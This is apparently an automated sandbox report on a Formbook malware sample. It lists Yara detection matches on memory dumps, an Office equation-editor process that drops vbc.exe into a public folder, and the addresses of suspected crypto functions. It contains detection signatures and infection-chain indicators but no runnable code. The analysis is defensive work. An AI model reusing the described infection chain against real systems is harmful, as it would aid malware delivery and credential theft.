Source: Yara match	File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe			Jump to dropped file

Yara signature match

Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_004030E3

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406043		4_2_00406043
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404618		4_2_00404618
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040681A		4_2_0040681A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10015C81		4_2_10015C81
Source: C:\Users\Public\vbc.exe	Code function: 4_2_100144A2		4_2_100144A2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10014A14		4_2_10014A14
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000C64B		4_2_1000C64B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10013F30		4_2_10013F30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000CB3F		4_2_1000CB3F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000CF57		4_2_1000CF57
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000D38C		4_2_1000D38C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000F39D		4_2_1000F39D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10016B9C		4_2_10016B9C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000D7C1		4_2_1000D7C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D856		5_2_0041D856
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D9F9		5_2_0041D9F9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DBBF		5_2_0041DBBF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DC1B		5_2_0041DC1B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041E5C4		5_2_0041E5C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D88		5_2_00402D88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409E60		5_2_00409E60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D7D5		5_2_0041D7D5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DF8C		5_2_0041DF8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077905A		5_2_0077905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00763040		5_2_00763040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078D005		5_2_0078D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075E0C6		5_2_0075E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075E2E9		5_2_0075E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00801238		5_2_00801238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AA37B		5_2_007AA37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00767353		5_2_00767353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008063BF		5_2_008063BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00762305		5_2_00762305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007863DB		5_2_007863DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075F3CF		5_2_0075F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079D47D		5_2_0079D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00795485		5_2_00795485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00771489		5_2_00771489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A6540		5_2_007A6540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076351F		5_2_0076351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077C5F0		5_2_0077C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AA634		5_2_007AA634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00802622		5_2_00802622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076E6C1		5_2_0076E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00764680		5_2_00764680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007957C3		5_2_007957C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076C7BC		5_2_0076C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E579A		5_2_007E579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078286D		5_2_0078286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076C85C		5_2_0076C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FF8EE		5_2_007FF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0080098E		5_2_0080098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E5955		5_2_007E5955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E394B		5_2_007E394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007769FE		5_2_007769FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007629B2		5_2_007629B2
